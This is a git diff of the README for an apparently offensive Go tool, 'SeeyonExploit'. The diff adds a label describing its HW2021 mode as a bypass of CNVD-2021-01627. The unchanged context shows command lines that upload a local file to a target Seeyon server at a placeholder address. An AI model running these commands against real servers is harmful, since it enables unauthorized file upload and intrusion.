diff --git a/README.md b/README.md index 91bbcbb..63462fe 100644 --- a/README.md +++ b/README.md @@ -29,7 +29,7 @@ go build -o SeeyonExploit main.go ``` ./SeeyonExploit CNVD202101627 -u http://xxx.xxx.xxx.xxx -f 本地文件 -n 服务端生成的文件名 ``` -#### HW2021 +#### HW2021 (2021HW nday 对CNVD202101627的绕过) ``` ./SeeyonExploit HW2021 -u http://xxx.xxx.xxx.xxx -f 本地文件 -n 服务端生成的文件名 ```